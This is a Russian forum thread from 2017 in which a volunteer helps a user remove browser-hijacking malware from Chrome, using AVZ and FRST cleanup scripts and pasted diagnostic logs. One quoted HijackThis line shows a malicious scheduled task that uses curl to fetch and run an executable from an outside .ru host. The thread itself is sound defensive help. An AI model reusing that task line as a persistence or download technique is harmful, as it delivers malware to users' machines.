В Google Chrome периодически открывается вкладка с непонятным сайтом

[valmlord]

Добрый времени суток!

 

С недавнего времени столкнулся в браузере с проблемой перехода на  один и тот же сайт на тему моды, хотя антивирус Касперского блокирует разные ссылки в разделе веб-антивируса. Пробовал разные программы для удаления вирусов но проблема не исчезла. Прикрепил логи.

 

P.S.- Заранее благодарен!

CollectionLog-2017.07.23-22.28.zip

Изменено 23 июля, 2017 пользователем valmlord

[regist]

 

 

Прикрепил логи.

где?

[valmlord]

Прошу прощения.)

[regist]

Здравствуйте!

- Проведите эту процедуру. Полученную ссылку после загрузки карантина virusinfo_auto_имя_вашего_ПК.zip через данную форму напишите в своём в сообщении здесь.

Закройте все программы, временно выгрузите антивирус, файрволл и прочее защитное ПО.

Выполните скрипт в АВЗ (Файл - Выполнить скрипт):
 

begin
 ExecuteFile('net.exe', 'stop tcpip /y', 0, 15000, true);
 ClearQuarantineEx(true);
 QuarantineFile('C:\Users\korsh\AppData\Roaming\Microsoft\msi.exe', '');
 QuarantineFileF('C:\Users\korsh\AppData\Roaming\curl\', '*.exe, *.dll, *.sys, *.bat, *.vbs, *.ps1, *.js*, *.tmp*', true, '', 0, 0);
 DeleteFile('C:\Users\korsh\AppData\Roaming\Microsoft\msi.exe', '32');
 ExecuteFile('schtasks.exe', '/delete /TN "curl" /F', 0, 15000, true);
 ExecuteFile('schtasks.exe', '/delete /TN "MSI" /F', 0, 15000, true);
 DeleteFileMask('C:\Users\korsh\AppData\Roaming\curl\', '*', true);
 DeleteDirectory('C:\Users\korsh\AppData\Roaming\curl\');
 CreateQurantineArchive(GetAVZDirectory + 'quarantine.zip');
ExecuteSysClean;
 ExecuteWizard('SCU', 2, 3, true);
RebootWindows(true);
end.

После выполнения скрипта компьютер перезагрузится.

 - Файл quarantine.zip из папки AVZ отправьте по адресу newvirus@kaspersky.com
Полученный ответ сообщите здесь (с указанием номера KLAN)
 
Повторите логи по правилам. Для повторной диагностики запустите снова Autologger. Для повторной диагностики запустите снова Autologger.

[valmlord]

[KLAN-6563168774]

 

Процедуру выполнил.

Новые логи. Но по ссылке все равно переходит.

CollectionLog-2017.07.24-10.21.zip

Изменено 24 июля, 2017 пользователем valmlord

[regist]

"Пофиксите" в HijackThis:

O8 - Extra context menu item: Закачать ВСЕ при помощи Download Master - (no file)
O8 - Extra context menu item: Закачать при помощи Download Master - (no file)
O8 - Extra context menu item: Передать на удаленную закачку DM - (no file)
O9-32 - Extra button: (no name) - HKLM\..\{8DAE90AD-4583-4977-9DD4-4360F7A45C74} - (no file)
O21 - ShellIconOverlayIdentifiers: 00asw - {472083B0-C522-11CF-8763-00608CC02F24} - (no file)
O22 - Task (Ready): MSI - C:\Users\korsh\AppData\Roaming\Microsoft\msi.exe cnt=2 fts="Downloads\adobe_snr_patch_v2_0___.exe" (file missing)
O22 - Task (Ready): curl - C:\Users\korsh\AppData\Roaming\curl\curl_7_54.exe -f -L "http://amtomil.ru/f.exe" -o "C:\Users\korsh\AppData\Roaming\curl\curl.exe" (file missing)
O22 - Task (Ready): curls - C:\Users\korsh\AppData\Roaming\curl\curl.exe (file missing)

 

Скачайте Farbar Recovery Scan Tool и сохраните на Рабочем столе.

Примечание: необходимо выбрать версию, совместимую с Вашей операционной системой. Если Вы не уверены, какая версия подойдет для Вашей системы, скачайте обе и попробуйте запустить. Только одна из них запустится на Вашей системе.
Запустите программу. Когда программа запустится, нажмите Yes для соглашения с предупреждением.
Отметьте галочкой также "Shortcut.txt".

Нажмите кнопку Scan.
После окончания сканирования будут созданы отчеты FRST.txt, Addition.txt, Shortcut.txt в той же папке, откуда была запущена программа. Прикрепите отчеты к своему следующему сообщению.
 

[valmlord]

Сделал.

FRST.txt

Shortcut.txt

Addition.txt

[regist]

• Отключите до перезагрузки антивирус.
• Выделите следующий код:
  

  Start::
  CreateRestorePoint:
  Task: {04FE8142-078C-4C8D-A6B3-E71B3AD58CC2} - System32\Tasks\curls => C:\Users\korsh\AppData\Roaming\curl\curl.exe <==== ATTENTION
  Task: {2DA78775-D5A1-4FF5-9F41-1002F45FB790} - System32\Tasks\S-1-5-21-622461763-1730611795-3261267339-1001\DataSenseLiveTileTask => C:\WINDOWS\System32\DataUsageLiveTileTask.exe [2017-03-18] (Microsoft Corporation)
  Task: {54FD84DD-93B6-412C-8CE7-61652B16E327} - System32\Tasks\MSI => C:\Users\korsh\AppData\Roaming\Microsoft\msi.exe
  2017-07-21 15:25 - 2017-07-21 15:25 - 00000000 ____D C:\Users\korsh\AppData\Local\Tempzxpsignb2647fd6355e3a09
  2017-07-21 15:25 - 2017-07-21 15:25 - 00000000 ____D C:\Users\korsh\AppData\Local\Tempzxpsign1ff9e8ccadfb791b
  2017-07-21 15:23 - 2017-07-21 15:23 - 00000000 ____D C:\Users\korsh\AppData\Local\Tempzxpsignf98c59fb8aa73d65
  2017-07-21 15:23 - 2017-07-21 15:23 - 00000000 ____D C:\Users\korsh\AppData\Local\Tempzxpsignb0b5818e61bf0927
  2017-07-21 15:23 - 2017-07-21 15:23 - 00000000 ____D C:\Users\korsh\AppData\Local\Tempzxpsign9446595e6997269d
  2017-07-21 15:23 - 2017-07-21 15:23 - 00000000 ____D C:\Users\korsh\AppData\Local\Tempzxpsign45f445e1b114190a
  2017-07-18 15:16 - 2017-07-18 15:16 - 00000000 ____D C:\Users\korsh\AppData\Local\Tempzxpsigne9fa9aecd1457c7e
  2017-07-18 15:16 - 2017-07-18 15:16 - 00000000 ____D C:\Users\korsh\AppData\Local\Tempzxpsign98654afdbb435ff7
  2017-07-18 15:16 - 2017-07-18 15:16 - 00000000 ____D C:\Users\korsh\AppData\Local\Tempzxpsign2ffdbae189d060a6
  2017-07-18 15:15 - 2017-07-18 15:15 - 00000000 ____D C:\Users\korsh\AppData\Local\Tempzxpsign72fc4b4c331c5c09
  2017-07-18 15:15 - 2017-07-18 15:15 - 00000000 ____D C:\Users\korsh\AppData\Local\Tempzxpsign586c353c36e55591
  2017-07-18 13:34 - 2017-07-18 13:34 - 00000000 ____D C:\Users\korsh\AppData\Local\Tempzxpsign7f142479ecb18662
  2017-07-18 13:34 - 2017-07-18 13:34 - 00000000 ____D C:\Users\korsh\AppData\Local\Tempzxpsign7dd8d17cce6f39d6
  2017-07-18 13:27 - 2017-07-18 13:27 - 00000000 ____D C:\Users\korsh\AppData\Local\Tempzxpsigne844ae9662544afd
  2017-07-18 13:27 - 2017-07-18 13:27 - 00000000 ____D C:\Users\korsh\AppData\Local\Tempzxpsignc21941d5bd6e16fa
  2017-07-16 00:00 - 2017-07-16 00:00 - 00000000 ____D C:\Users\korsh\AppData\Local\Tempzxpsigncc347c9cda4ebc3c
  2017-07-16 00:00 - 2017-07-16 00:00 - 00000000 ____D C:\Users\korsh\AppData\Local\Tempzxpsign46fe240577c62dc2
  2017-07-16 00:00 - 2017-07-16 00:00 - 00000000 ____D C:\Users\korsh\AppData\Local\Tempzxpsign04e77205866ab10d
  2017-07-11 09:53 - 2017-07-11 09:53 - 00000000 ____D C:\Users\korsh\AppData\Local\Tempzxpsignaae2bc5cb51a03ad
  2017-07-11 09:53 - 2017-07-11 09:53 - 00000000 ____D C:\Users\korsh\AppData\Local\Tempzxpsign9ef3b70db1bad327
  2017-07-10 20:27 - 2017-07-10 20:27 - 00000000 ____D C:\Users\korsh\AppData\Local\Tempzxpsignc3e8eae2e0d34aae
  2017-07-10 20:26 - 2017-07-10 20:26 - 00000000 ____D C:\Users\korsh\AppData\Local\Tempzxpsign79a93fa63b208c2d
  2017-07-10 20:26 - 2017-07-10 20:26 - 00000000 ____D C:\Users\korsh\AppData\Local\Tempzxpsign260ff3c57ba639a0
  2017-07-04 09:19 - 2017-07-04 09:19 - 00000000 ____D C:\Users\korsh\AppData\Local\Tempzxpsignd594cc74dd597bec
  2017-07-04 09:19 - 2017-07-04 09:19 - 00000000 ____D C:\Users\korsh\AppData\Local\Tempzxpsignaeb44e4012ba6c33
  2017-07-04 09:19 - 2017-07-04 09:19 - 00000000 ____D C:\Users\korsh\AppData\Local\Tempzxpsign7f4e20de6fe7515e
  2017-07-02 18:01 - 2017-07-02 18:01 - 00000000 ____D C:\Users\korsh\AppData\Local\Tempzxpsignefe9c21f5b7d0e3c
  2017-07-02 18:01 - 2017-07-02 18:01 - 00000000 ____D C:\Users\korsh\AppData\Local\Tempzxpsign9c7a4c68c7345059
  2017-07-02 18:01 - 2017-07-02 18:01 - 00000000 ____D C:\Users\korsh\AppData\Local\Tempzxpsign705a1c5d19a57b0a
  2017-07-02 18:01 - 2017-07-02 18:01 - 00000000 ____D C:\Users\korsh\AppData\Local\Tempzxpsign6e0c021a84327464
  2017-06-30 15:26 - 2017-06-30 15:26 - 00000000 ____D C:\Users\korsh\AppData\Local\Tempzxpsignfcd99e10f5556339
  2017-06-30 15:26 - 2017-06-30 15:26 - 00000000 ____D C:\Users\korsh\AppData\Local\Tempzxpsigncb9814e63a9d1f48
  2017-06-30 12:26 - 2017-06-30 12:26 - 00000000 ____D C:\Users\korsh\AppData\Local\Tempzxpsign95ee08595d98b80d
  2017-06-30 12:26 - 2017-06-30 12:26 - 00000000 ____D C:\Users\korsh\AppData\Local\Tempzxpsign813e4e7fc63bf8db
  2017-06-30 12:26 - 2017-06-30 12:26 - 00000000 ____D C:\Users\korsh\AppData\Local\Tempzxpsign7b834b74203ecab4
  2017-06-30 12:26 - 2017-06-30 12:26 - 00000000 ____D C:\Users\korsh\AppData\Local\Tempzxpsign5e26b5a05b6d84eb
  2017-06-30 12:26 - 2017-06-30 12:26 - 00000000 ____D C:\Users\korsh\AppData\Local\Tempzxpsign412988fc9fcf7c18
  2017-06-30 12:21 - 2017-06-30 12:21 - 00000000 ____D C:\Users\korsh\AppData\Local\Tempzxpsigna02dfb9b2cb3be5c
  2017-06-30 12:20 - 2017-06-30 12:20 - 00000000 ____D C:\Users\korsh\AppData\Local\Tempzxpsigncd891ec1454d2864
  2017-06-30 12:20 - 2017-06-30 12:20 - 00000000 ____D C:\Users\korsh\AppData\Local\Tempzxpsign1fcbc461bcfc12f4
  2017-06-30 12:19 - 2017-06-30 12:19 - 00000000 ____D C:\Users\korsh\AppData\Local\Tempzxpsignfc08370a161c0e69
  2017-06-30 12:19 - 2017-06-30 12:19 - 00000000 ____D C:\Users\korsh\AppData\Local\Tempzxpsignc019c40d13fd2614
  2017-06-30 12:19 - 2017-06-30 12:19 - 00000000 ____D C:\Users\korsh\AppData\Local\Tempzxpsigna3617627162fbc7a
  2017-06-30 12:19 - 2017-06-30 12:19 - 00000000 ____D C:\Users\korsh\AppData\Local\Tempzxpsign3994bc82809fbda6
  2017-06-30 12:17 - 2017-06-30 12:17 - 00000000 ____D C:\Users\korsh\AppData\Local\Tempzxpsign8cfa1402eb65c4ba
  2017-06-30 12:17 - 2017-06-30 12:17 - 00000000 ____D C:\Users\korsh\AppData\Local\Tempzxpsign81d088a9745af97e
  2017-06-30 12:17 - 2017-06-30 12:17 - 00000000 ____D C:\Users\korsh\AppData\Local\Tempzxpsign7c283eb03c9a70a8
  2017-07-10 20:21 - 2017-07-15 23:19 - 0004910 _____ () C:\Program Files\Common Files\csdkConfiguratorLog.txt
  2017-07-18 13:32 - 2017-07-18 20:20 - 0000033 _____ () C:\Users\korsh\AppData\Roaming\AdobeWLCMCache.dat
  2017-06-30 11:19 - 2017-07-24 10:54 - 0000165 _____ () C:\Users\korsh\AppData\Roaming\sp_data.sys
  2017-07-21 17:10 - 2017-07-21 17:10 - 0000032 RSHOT () C:\Users\korsh\AppData\Local\t80.dat
  2017-06-30 01:59 - 2017-06-30 01:59 - 0000000 ____H () C:\ProgramData\DP45977C.lfl
  EmptyTemp:
  Reboot:
  End::

• Скопируйте выделенный текст (правой кнопкой - Копировать).
• Запустите FRST (FRST64) от имени администратора.
• Нажмите Fix и подождите. Программа создаст лог-файл (Fixlog.txt). Прикрепите его к своему следующему сообщению.

Компьютер будет перезагружен автоматически.
 

[valmlord]

Готово.

Fixlog.txt

[regist]

Свежие логи FRST сделайте и что с проблемой?

[valmlord]

Свежие логи. Но проблема не ушла,так и кидает на этот сайт.

Addition.txt

FRST.txt

Shortcut.txt

[regist]

1) Проблема только в Хроме? Проверьте в других браузерах.

 

2) Эти расширения все знакомы?

 

CHR Extension: (Скачать музыку с Вконтакте (vk.com)) - C:\Users\korsh\AppData\Local\Google\Chrome\User Data\Default\Extensions\afkpfjljjhhonjehpkmgonimjjgaheap [2017-07-13]
CHR Extension: (Диск Google) - C:\Users\korsh\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2017-06-30]
CHR Extension: (Красоты) - C:\Users\korsh\AppData\Local\Google\Chrome\User Data\Default\Extensions\bbbelgoeoihcmnkgkeanmogncgkfichm [2017-06-30]
CHR Extension: (Tab Resize - split screen layouts) - C:\Users\korsh\AppData\Local\Google\Chrome\User Data\Default\Extensions\bkpenclhmiealbebdopglffmfdiilejc [2017-06-30]
CHR Extension: (YouTube) - C:\Users\korsh\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2017-06-30]
CHR Extension: (uDev - Web Developer Toolbar) - C:\Users\korsh\AppData\Local\Google\Chrome\User Data\Default\Extensions\deeboegbjcnfgidliakhpoapnpomphji [2017-06-30]
CHR Extension: (Tampermonkey) - C:\Users\korsh\AppData\Local\Google\Chrome\User Data\Default\Extensions\dhdgffkkebhmkfjojejmpbldmpobfkfo [2017-06-30]
CHR Extension: (Adobe Acrobat) - C:\Users\korsh\AppData\Local\Google\Chrome\User Data\Default\Extensions\efaidnbmnnnibpcajpcglclefindmkaj [2017-07-11]
CHR Extension: (Fontface Ninja) - C:\Users\korsh\AppData\Local\Google\Chrome\User Data\Default\Extensions\eljapbgkmlngdpckoiiibecpemleclhh [2017-06-30]
CHR Extension: (AdBlock) - C:\Users\korsh\AppData\Local\Google\Chrome\User Data\Default\Extensions\gighmmpiobklfepjocnamgkkbiglidom [2017-07-20]
CHR Extension: (Eye Dropper) - C:\Users\korsh\AppData\Local\Google\Chrome\User Data\Default\Extensions\hmdcmlfkchdmnmnmheododdhjedfccka [2017-07-22]
CHR Extension: (LiveReload) - C:\Users\korsh\AppData\Local\Google\Chrome\User Data\Default\Extensions\jnihajbhpnppcggbcgedagnkighmdlei [2017-06-30]
CHR Extension: (Speed Dial 2) - C:\Users\korsh\AppData\Local\Google\Chrome\User Data\Default\Extensions\jpfpebmajhhopeonhlcgidhclcccjcik [2017-06-30]
CHR Extension: (Бесплатный прокси-сервер VPN Hotspot Shield — разблокировка сайтов) - C:\Users\korsh\AppData\Local\Google\Chrome\User Data\Default\Extensions\nlbejmccbhkncgokjcmghpfloaajcffj [2017-07-22]
CHR Extension: (Платежная система Интернет-магазина Chrome) - C:\Users\korsh\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2017-06-30]
CHR Extension: (Checker Plus for Gmail™) - C:\Users\korsh\AppData\Local\Google\Chrome\User Data\Default\Extensions\oeopbcgkkoapgobdbedcemjljbihmemj [2017-07-24]
CHR Extension: (Visual Event) - C:\Users\korsh\AppData\Local\Google\Chrome\User Data\Default\Extensions\pbmmieigblcbldgdokdjpioljjninaim [2017-06-30]
CHR Extension: (Evernote Web Clipper) - C:\Users\korsh\AppData\Local\Google\Chrome\User Data\Default\Extensions\pioclpoplcdbaefihamjohnefbikjilc [2017-06-30]
CHR Extension: (Gmail) - C:\Users\korsh\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2017-06-30]
CHR Extension: (Chrome Media Router) - C:\Users\korsh\AppData\Local\Google\Chrome\User Data\Default\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm [2017-07-14]

[valmlord]

В других браузерах вроде не переходит.

CHR Extension: (Красоты) - C:\Users\korsh\AppData\Local\Google\Chrome\User Data\Default\Extensions\bbbelgoeoihcmnkgkeanmogncgkfichm [2017-06-30]

CHR Extension: (Chrome Media Router) - C:\Users\korsh\AppData\Local\Google\Chrome\User Data\Default\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm [2017-07-14]

 

Вот это не знаю.

Изменено 25 июля, 2017 пользователем valmlord

[regist]

 

 

CHR Extension: (Красоты) - C:\Users\korsh\AppData\Local\Google\Chrome\User Data\Default\Extensions\bbbelgoeoihcmnkgkeanmogncgkfichm [2017-06-30]

Вот это удалите через управление расширениями и проверьте проблему.

[valmlord]

У Google chrome в расширениях нету его в списках. Можно папку с ним через проводник удалить?

 

Жесть какая-то, первый раз сталкиваюсь с таким вирусом неудоляемым).

Изменено 25 июля, 2017 пользователем valmlord